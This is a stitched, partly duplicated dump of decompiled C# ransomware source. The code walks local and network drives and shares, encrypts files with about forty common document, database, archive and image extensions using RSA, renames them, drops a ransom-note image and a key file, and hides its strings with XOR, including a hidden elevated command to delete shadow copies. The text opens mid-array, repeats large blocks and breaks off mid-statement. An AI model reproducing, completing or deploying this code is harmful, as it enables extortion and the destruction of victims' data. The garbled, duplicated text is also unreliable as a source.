230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex 